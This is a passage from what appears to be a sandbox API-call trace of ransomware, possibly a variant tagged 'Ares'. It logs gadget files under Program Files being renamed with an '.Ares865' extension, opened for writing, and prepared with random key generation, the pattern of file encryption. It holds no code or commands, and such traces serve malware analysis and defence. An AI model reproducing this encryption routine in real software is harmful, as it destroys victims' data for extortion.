sidebar\\gadgets\\currency.gadget\\images\\graph_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_over.png.ares865"), dwFlags=0x1) returned 1 [0118.586] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.586] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3428) returned 1 [0118.586] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.587] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.587] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.590] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.590] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.590] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.591] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png.Ares865") returned 90 [0118.591] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_up.png.ares865"), dwFlags=0x1) returned 1 [0118.592] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.592] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2929) returned 1 [0118.593] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.593] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.593] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.595] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.596] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.596] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.597] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png.Ares865") returned 86 [0118.597] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\info.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\info.png.ares865"), dwFlags=0x1) returned 1 [0118.598] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\info.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.599] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=729) returned 1 [0118.599] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.599] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.599] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.602] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.602] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.602] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.603] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png.Ares865") returned 90 [0118.603] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\row_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\row_over.png.ares865"), dwFlags=0x1) returned 1 [0118.604] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\row_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\row_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.604] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3034) returned 1 [0118.605] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.605] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.605] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.608] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.609] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.609] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.609] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png.Ares865") returned 90 [0118.609] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\triangle.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\triangle.png.ares865"), dwFlags=0x1) returned 1 [0118.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\triangle.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2831) returned 1 [0118.611] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.611] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.611] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.614] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.614] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.614] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.615] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US" [0118.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html.Ares865") returned 90 [0118.616] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html.ares865"), dwFlags=0x1) returned 1 [0118.617] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.617] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6034) returned 1 [0118.617] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.618] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.618] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.620] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.621] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.621] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.622] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js" [0118.622] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\currency.js.Ares865") returned 91 [0118.622] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\currency.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\currency.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\currency.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\currency.js.ares865"), dwFlags=0x1) returned 1 [0118.624] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\currency.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\currency.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.624] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=66782) returned 1 [0118.624] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.625] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.625] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.631] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.632] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.632] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.633] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\init.js.Ares865") returned 87 [0118.633] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\init.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\init.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\init.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\init.js.ares865"), dwFlags=0x1) returned 1 [0118.635] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\init.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\init.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.635] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=724) returned 1 [0118.635] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.636] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.636] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.639] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.639] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.639] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.640] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\library.js.Ares865") returned 90 [0118.640] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\library.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\library.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\library.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\library.js.ares865"), dwFlags=0x1) returned 1 [0118.642] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\library.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\library.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.642] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5662) returned 1 [0118.642] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.643] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.643] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.649] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.649] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.650] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.650] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\localizedStrings.js.Ares865") returned 99 [0118.650] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\localizedStrings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\localizedstrings.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\localizedStrings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\localizedstrings.js.ares865"), dwFlags=0x1) returned 1 [0118.651] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\localizedStrings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\localizedstrings.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.651] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11252) returned 1 [0118.652] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.652] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.652] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.655] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.656] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.656] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\service.js.Ares865") returned 90 [0118.657] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\service.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\service.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\service.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\service.js.ares865"), dwFlags=0x1) returned 1 [0118.658] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\service.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\service.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.658] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7720) returned 1 [0118.659] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.659] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.659] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.664] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.665] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.665] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.666] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css" [0118.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css.Ares865") returned 93 [0118.666] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\currency.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\currency.css.ares865"), dwFlags=0x1) returned 1 [0118.667] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\currency.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.668] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19502) returned 1 [0118.668] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.669] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.669] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.672] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.672] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.672] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.673] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget" [0118.674] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.Ares865") returned 74 [0118.674] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0118.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20252) returned 1 [0118.677] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.678] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.678] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.681] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.682] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.682] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.683] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.Ares865") returned 74 [0118.683] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows 